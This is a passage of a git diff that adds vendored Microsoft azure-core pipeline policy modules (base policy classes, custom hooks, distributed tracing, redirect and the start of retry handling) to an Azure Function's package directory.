modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request: "PipelineRequest") -> None: + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. 
+ + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return + + def _need_new_token(self) -> bool: + return not self._token or self._token.expires_on - time.time() < 300 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base.py new file mode 100644 index 0000000..49b245a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base.py @@ -0,0 +1,149 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import abc +import copy +import logging + +from typing import ( + Generic, + TypeVar, + Union, + Any, + Dict, + Optional, +) # pylint: disable=unused-import + +try: + from typing import Awaitable # pylint: disable=unused-import +except ImportError: + pass + +from azure.core.pipeline import ABC, PipelineRequest, PipelineResponse + + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +_LOGGER = logging.getLogger(__name__) + +class HTTPPolicy(ABC, Generic[HTTPRequestType, HTTPResponseType]): + """An HTTP policy ABC. + + Use with a synchronous pipeline. + + :param next: Use to process the next policy in the pipeline. Set when pipeline is + instantiated and all policies chained. + :type next: ~azure.core.pipeline.policies.HTTPPolicy or ~azure.core.pipeline.transport.HttpTransport + """ + + def __init__(self): + self.next = None # type: Union[HTTPPolicy, HttpTransport] + + @abc.abstractmethod + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Abstract send method for a synchronous pipeline. Mutates the request. + + Context content is dependent on the HttpTransport. + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + :return: The pipeline response object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + + +class SansIOHTTPPolicy(Generic[HTTPRequestType, HTTPResponseType]): + """Represents a sans I/O policy. 
+ + SansIOHTTPPolicy is a base class for policies that only modify or + mutate a request based on the HTTP specification, and do not depend + on the specifics of any particular transport. SansIOHTTPPolicy + subclasses will function in either a Pipeline or an AsyncPipeline, + and can act either before the request is done, or after. + You can optionally make these methods coroutines (or return awaitable objects) + but they will then be tied to AsyncPipeline usage. + """ + + def on_request(self, request): + # type: (PipelineRequest) -> Union[None, Awaitable[None]] + """Is executed before sending the request from next policy. + + :param request: Request to be modified before sent from next policy. + :type request: ~azure.core.pipeline.PipelineRequest + """ + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> Union[None, Awaitable[None]] + """Is executed after the request comes back from the policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + # pylint: disable=no-self-use + def on_exception(self, request): # pylint: disable=unused-argument + # type: (PipelineRequest) -> None + """Is executed if an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START on_exception] + :end-before: [END on_exception] + :language: python + :dedent: 4 + """ + return + + +class RequestHistory(object): + """A container for an attempted request and the applicable response. + + This is used to document requests/responses that resulted in redirected/retried requests. + + :param http_request: The request. + :type http_request: ~azure.core.pipeline.transport.HttpRequest + :param http_response: The HTTP response. + :type http_response: ~azure.core.pipeline.transport.HttpResponse + :param Exception error: An error encountered during the request, or None if the response was received successfully. + :param dict context: The pipeline context. + """ + + def __init__(self, http_request, http_response=None, error=None, context=None): + # type: (HTTPRequestType, Optional[HTTPResponseType], Exception, Optional[Dict[str, Any]]) -> None + self.http_request = copy.deepcopy(http_request) + self.http_response = http_response + self.error = error + self.context = context diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base_async.py new file mode 100644 index 0000000..7d3c046 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base_async.py @@ -0,0 +1,77 @@ + +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
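A minimal sketch of the `SansIOHTTPPolicy` contract described above: because the policy performs no I/O of its own, the same class works in both a Pipeline and an AsyncPipeline. The header name and context key are invented for the example:

```python
from azure.core.pipeline.policies import SansIOHTTPPolicy

class StampHeaderPolicy(SansIOHTTPPolicy):
    def on_request(self, request):
        # runs before the request is handed to the next policy
        request.http_request.headers["x-example-stamp"] = "1"

    def on_response(self, request, response):
        # runs after the response comes back; stash data on the shared context
        request.context["last_status"] = response.http_response.status_code
```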
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+import abc
+
+from typing import Generic, TypeVar, Union, Any, cast
+
+from azure.core.pipeline import PipelineRequest
+
+try:
+    from contextlib import AbstractAsyncContextManager  # type: ignore #pylint: disable=unused-import
+except ImportError:  # Python <= 3.6
+    class AbstractAsyncContextManager(object):  # type: ignore
+        async def __aenter__(self):
+            """Return `self` upon entering the runtime context."""
+            return self
+
+        @abc.abstractmethod
+        async def __aexit__(self, exc_type, exc_value, traceback):
+            """Raise any exception triggered within the runtime context."""
+            return None
+
+
+AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType")
+HTTPResponseType = TypeVar("HTTPResponseType")
+HTTPRequestType = TypeVar("HTTPRequestType")
+
+
+class AsyncHTTPPolicy(abc.ABC, Generic[HTTPRequestType, AsyncHTTPResponseType]):
+    """An async HTTP policy ABC.
+
+    Use with an asynchronous pipeline.
+
+    :param next: Use to process the next policy in the pipeline. Set when pipeline
+     is instantiated and all policies chained.
+    :type next: ~azure.core.pipeline.policies.AsyncHTTPPolicy or ~azure.core.pipeline.transport.AsyncHttpTransport
+    """
+    def __init__(self) -> None:
+        # next will be set once in the pipeline
+        from ..transport._base_async import AsyncHttpTransport
+        self.next = cast(Union[AsyncHTTPPolicy,
+                               AsyncHttpTransport], None)
+
+    @abc.abstractmethod
+    async def send(self, request: PipelineRequest):
+        """Abstract send method for an asynchronous pipeline. Mutates the request.
+
+        Context content is dependent on the HttpTransport.
+
+        :param request: The pipeline request object.
+        :type request: ~azure.core.pipeline.PipelineRequest
+        :return: The pipeline response object.
+        :rtype: ~azure.core.pipeline.PipelineResponse
+        """
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_custom_hook.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_custom_hook.py
new file mode 100644
index 0000000..1b81aeb
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_custom_hook.py
@@ -0,0 +1,73 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+from azure.core.pipeline import PipelineRequest, PipelineResponse
+from ._base import SansIOHTTPPolicy
+
+class CustomHookPolicy(SansIOHTTPPolicy):
+    """A simple policy that enables the given callbacks
+    with the request and response.
+
+    :keyword callback raw_request_hook: Callback function. Will be invoked on request.
+    :keyword callback raw_response_hook: Callback function. Will be invoked on response.
+    """
+    def __init__(self, **kwargs):  # pylint: disable=unused-argument,super-init-not-called
+        self._request_callback = kwargs.get('raw_request_hook')
+        self._response_callback = kwargs.get('raw_response_hook')
+
+    def on_request(self, request):  # pylint: disable=arguments-differ
+        # type: (PipelineRequest) -> None
+        """This is executed before sending the request to the next policy.
+
+        :param request: The PipelineRequest object.
+        :type request: ~azure.core.pipeline.PipelineRequest
+        """
+        request_callback = request.context.options.pop('raw_request_hook', None)
+        if request_callback:
+            request.context["raw_request_hook"] = request_callback
+            request_callback(request)
+        elif self._request_callback:
+            self._request_callback(request)
+
+        response_callback = request.context.options.pop('raw_response_hook', None)
+        if response_callback:
+            request.context["raw_response_hook"] = response_callback
+
+    def on_response(self, request, response):  # pylint: disable=arguments-differ
+        # type: (PipelineRequest, PipelineResponse) -> None
+        """This is executed after the request comes back from the policy.
+
+        :param request: The PipelineRequest object.
+        :type request: ~azure.core.pipeline.PipelineRequest
+        :param response: The PipelineResponse object.
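A usage sketch for the hook mechanism above; hooks can be fixed at construction time or supplied per operation, since `on_request` pops `raw_request_hook`/`raw_response_hook` from the request context options. The printing callbacks are purely illustrative:

```python
from azure.core.pipeline.policies import CustomHookPolicy

def log_request(pipeline_request):
    http = pipeline_request.http_request
    print("->", http.method, http.url)

def log_response(pipeline_response):
    print("<-", pipeline_response.http_response.status_code)

policy = CustomHookPolicy(raw_request_hook=log_request,
                          raw_response_hook=log_response)
```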
+ :type response: ~azure.core.pipeline.PipelineResponse + """ + response_callback = response.context.get("raw_response_hook") + if response_callback: + response_callback(response) + elif self._response_callback: + self._response_callback(response) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_distributed_tracing.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_distributed_tracing.py new file mode 100644 index 0000000..7449d35 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_distributed_tracing.py @@ -0,0 +1,132 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# -------------------------------------------------------------------------- +"""Traces network calls using the implementation library from the settings.""" +import logging +import sys +from six.moves import urllib + +from azure.core.pipeline.policies import SansIOHTTPPolicy +from azure.core.settings import settings +from azure.core.tracing import SpanKind + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + # the HttpRequest and HttpResponse related type ignores stem from this issue: #5796 + from azure.core.pipeline.transport import HttpRequest, HttpResponse, AsyncHttpResponse # pylint: disable=ungrouped-imports + from azure.core.tracing._abstract_span import AbstractSpan # pylint: disable=ungrouped-imports + from azure.core.pipeline import PipelineRequest, PipelineResponse # pylint: disable=ungrouped-imports + from typing import Any, Optional, Dict, List, Union, Tuple + HttpResponseType = Union[HttpResponse, AsyncHttpResponse] + + +_LOGGER = logging.getLogger(__name__) + + +def _default_network_span_namer(http_request): + # type (HttpRequest) -> str + """Extract the path to be used as network span name. 
+ + :param http_request: The HTTP request + :type http_request: ~azure.core.pipeline.transport.HttpRequest + :returns: The string to use as network span name + :rtype: str + """ + path = urllib.parse.urlparse(http_request.url).path + if not path: + path = "/" + return path + + +class DistributedTracingPolicy(SansIOHTTPPolicy): + """The policy to create spans for Azure calls. + + :keyword network_span_namer: A callable to customize the span name + :type network_span_namer: callable[[~azure.core.pipeline.transport.HttpRequest], str] + :keyword tracing_attributes: Attributes to set on all created spans + :type tracing_attributes: dict[str, str] + """ + TRACING_CONTEXT = "TRACING_CONTEXT" + _REQUEST_ID = "x-ms-client-request-id" + _RESPONSE_ID = "x-ms-request-id" + + def __init__(self, **kwargs): + self._network_span_namer = kwargs.get('network_span_namer', _default_network_span_namer) + self._tracing_attributes = kwargs.get('tracing_attributes', {}) + + def on_request(self, request): + # type: (PipelineRequest) -> None + ctxt = request.context.options + try: + span_impl_type = settings.tracing_implementation() + if span_impl_type is None: + return + + namer = ctxt.pop('network_span_namer', self._network_span_namer) + span_name = namer(request.http_request) + + span = span_impl_type(name=span_name, kind=SpanKind.CLIENT) + for attr, value in self._tracing_attributes.items(): + span.add_attribute(attr, value) + span.start() + + headers = span.to_header() + request.http_request.headers.update(headers) + + request.context[self.TRACING_CONTEXT] = span + except Exception as err: # pylint: disable=broad-except + _LOGGER.warning("Unable to start network span: %s", err) + + def end_span(self, request, response=None, exc_info=None): + # type: (PipelineRequest, Optional[HttpResponseType], Optional[Tuple]) -> None + """Ends the span that is tracing the network and updates its status.""" + if self.TRACING_CONTEXT not in request.context: + return + + span = request.context[self.TRACING_CONTEXT] # type: AbstractSpan + http_request = request.http_request # type: HttpRequest + if span is not None: + span.set_http_attributes(http_request, response=response) + request_id = http_request.headers.get(self._REQUEST_ID) + if request_id is not None: + span.add_attribute(self._REQUEST_ID, request_id) + if response and self._RESPONSE_ID in response.headers: + span.add_attribute(self._RESPONSE_ID, response.headers[self._RESPONSE_ID]) + if exc_info: + span.__exit__(*exc_info) + else: + span.finish() + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + self.end_span(request, response=response.http_response) + + def on_exception(self, request): + # type: (PipelineRequest) -> None + self.end_span(request, exc_info=sys.exc_info()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect.py new file mode 100644 index 0000000..fbaff1a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect.py @@ -0,0 +1,166 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
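Since `DistributedTracingPolicy` accepts a `network_span_namer` callable, the default path-based naming above can be replaced. A small sketch, where the extra tracing attribute key and value are invented for the example:

```python
from urllib.parse import urlparse
from azure.core.pipeline.policies import DistributedTracingPolicy

def verb_and_path_namer(http_request):
    # Same path extraction as _default_network_span_namer, plus the HTTP verb.
    return "{} {}".format(http_request.method, urlparse(http_request.url).path or "/")

policy = DistributedTracingPolicy(
    network_span_namer=verb_and_path_namer,
    tracing_attributes={"service.tier": "demo"},  # invented attribute key/value
)
```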
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import logging +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +try: + from urlparse import urlparse # type: ignore +except ImportError: + from urllib.parse import urlparse + +from azure.core.exceptions import TooManyRedirectsError + +from ._base import HTTPPolicy, RequestHistory + + +_LOGGER = logging.getLogger(__name__) + +class RedirectPolicyBase(object): + + REDIRECT_STATUSES = frozenset([300, 301, 302, 303, 307, 308]) + + REDIRECT_HEADERS_BLACKLIST = frozenset(['Authorization']) + + def __init__(self, **kwargs): + self.allow = kwargs.get('permit_redirects', True) + self.max_redirects = kwargs.get('redirect_max', 30) + + remove_headers = set(kwargs.get('redirect_remove_headers', [])) + self._remove_headers_on_redirect = remove_headers.union(self.REDIRECT_HEADERS_BLACKLIST) + redirect_status = set(kwargs.get('redirect_on_status_codes', [])) + self._redirect_on_status_codes = redirect_status.union(self.REDIRECT_STATUSES) + super(RedirectPolicyBase, self).__init__() + + @classmethod + def no_redirects(cls): + """Disable redirects. + """ + return cls(permit_redirects=False) + + def configure_redirects(self, options): + """Configures the redirect settings. + + :param options: Keyword arguments from context. + :return: A dict containing redirect settings and a history of redirects. + :rtype: dict + """ + return { + 'allow': options.pop("permit_redirects", self.allow), + 'redirects': options.pop("redirect_max", self.max_redirects), + 'history': [] + } + + def get_redirect_location(self, response): + """Checks for redirect status code and gets redirect location. + + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: Truthy redirect location string if we got a redirect status + code and valid location. ``None`` if redirect status and no + location. ``False`` if not a redirect status code. 
+ """ + if response.http_response.status_code in [301, 302]: + if response.http_request.method in ['GET', 'HEAD', ]: + return response.http_response.headers.get('location') + return False + if response.http_response.status_code in self._redirect_on_status_codes: + return response.http_response.headers.get('location') + + return False + + def increment(self, settings, response, redirect_location): + """Increment the redirect attempts for this request. + + :param dict settings: The redirect settings + :param response: A pipeline response object. + :type response: ~azure.core.pipeline.PipelineResponse + :param str redirect_location: The redirected endpoint. + :return: Whether further redirect attempts are remaining. + False if exhausted; True if more redirect attempts available. + :rtype: bool + """ + # TODO: Revise some of the logic here. + settings['redirects'] -= 1 + settings['history'].append(RequestHistory(response.http_request, http_response=response.http_response)) + + redirected = urlparse(redirect_location) + if not redirected.netloc: + base_url = urlparse(response.http_request.url) + response.http_request.url = "{}://{}/{}".format( + base_url.scheme, + base_url.netloc, + redirect_location.lstrip('/')) + else: + response.http_request.url = redirect_location + if response.http_response.status_code == 303: + response.http_request.method = 'GET' + for non_redirect_header in self._remove_headers_on_redirect: + response.http_request.headers.pop(non_redirect_header, None) + return settings['redirects'] >= 0 + +class RedirectPolicy(RedirectPolicyBase, HTTPPolicy): + """A redirect policy. + + A redirect policy in the pipeline can be configured directly or per operation. + + :keyword bool permit_redirects: Whether the client allows redirects. Defaults to True. + :keyword int redirect_max: The maximum allowed redirects. Defaults to 30. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START redirect_policy] + :end-before: [END redirect_policy] + :language: python + :dedent: 4 + :caption: Configuring a redirect policy. + """ + + def send(self, request): + """Sends the PipelineRequest object to the next policy. + Uses redirect settings to send request to redirect endpoint if necessary. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum redirects exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises: ~azure.core.exceptions.TooManyRedirectsError if maximum redirects exceeded. 
+ """ + retryable = True + redirect_settings = self.configure_redirects(request.context.options) + while retryable: + response = self.next.send(request) + redirect_location = self.get_redirect_location(response) + if redirect_location and redirect_settings['allow']: + retryable = self.increment(redirect_settings, response, redirect_location) + request.http_request = response.http_request + continue + return response + + raise TooManyRedirectsError(redirect_settings['history']) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect_async.py new file mode 100644 index 0000000..74012f0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_redirect_async.py @@ -0,0 +1,72 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Any, Callable, Optional + +from azure.core.exceptions import TooManyRedirectsError +from . import AsyncHTTPPolicy +from ._redirect import RedirectPolicyBase + + +class AsyncRedirectPolicy(RedirectPolicyBase, AsyncHTTPPolicy): + """An async redirect policy. + + An async redirect policy in the pipeline can be configured directly or per operation. + + :keyword bool permit_redirects: Whether the client allows redirects. Defaults to True. + :keyword int redirect_max: The maximum allowed redirects. Defaults to 30. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START async_redirect_policy] + :end-before: [END async_redirect_policy] + :language: python + :dedent: 4 + :caption: Configuring an async redirect policy. + """ + + async def send(self, request): # pylint:disable=invalid-overridden-method + """Sends the PipelineRequest object to the next policy. + Uses redirect settings to send the request to redirect endpoint if necessary. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum redirects exceeded. 
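A quick configuration sketch using the keywords documented on the redirect policies above (the extra header name is invented; `Authorization` is always stripped via `REDIRECT_HEADERS_BLACKLIST`):

```python
from azure.core.pipeline.policies import RedirectPolicy

redirect_policy = RedirectPolicy(
    redirect_max=5,                         # lower the default cap of 30
    redirect_remove_headers=["x-session"],  # dropped on every hop, like Authorization
)

no_redirects = RedirectPolicy.no_redirects()  # classmethod shorthand for permit_redirects=False
```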
+ :rtype: ~azure.core.pipeline.PipelineResponse + :raises: ~azure.core.exceptions.TooManyRedirectsError if maximum redirects exceeded. + """ + redirects_remaining = True + redirect_settings = self.configure_redirects(request.context.options) + while redirects_remaining: + response = await self.next.send(request) + redirect_location = self.get_redirect_location(response) + if redirect_location and redirect_settings['allow']: + redirects_remaining = self.increment(redirect_settings, response, redirect_location) + request.http_request = response.http_request + continue + return response + + raise TooManyRedirectsError(redirect_settings['history']) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry.py new file mode 100644 index 0000000..c822932 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_retry.py @@ -0,0 +1,475 @@ +#pylint: disable=no-self-use +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +from io import SEEK_SET, UnsupportedOperation +import logging +import time +from enum import Enum +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +from azure.core.pipeline import PipelineResponse +from azure.core.exceptions import ( + AzureError, + ClientAuthenticationError, + ServiceResponseError, + ServiceRequestError, + ServiceRequestTimeoutError, + ServiceResponseTimeoutError, +) + +from ._base import HTTPPolicy, RequestHistory +from . import _utils +from ..._enum_meta import CaseInsensitiveEnumMeta + +_LOGGER = logging.getLogger(__name__) + +class RetryMode(str, Enum, metaclass=CaseInsensitiveEnumMeta): + # pylint: disable=enum-must-be-uppercase + Exponential = 'exponential' + Fixed = 'fixed' + +class RetryPolicyBase(object): + # pylint: disable=too-many-instance-attributes + #: Maximum backoff time. 
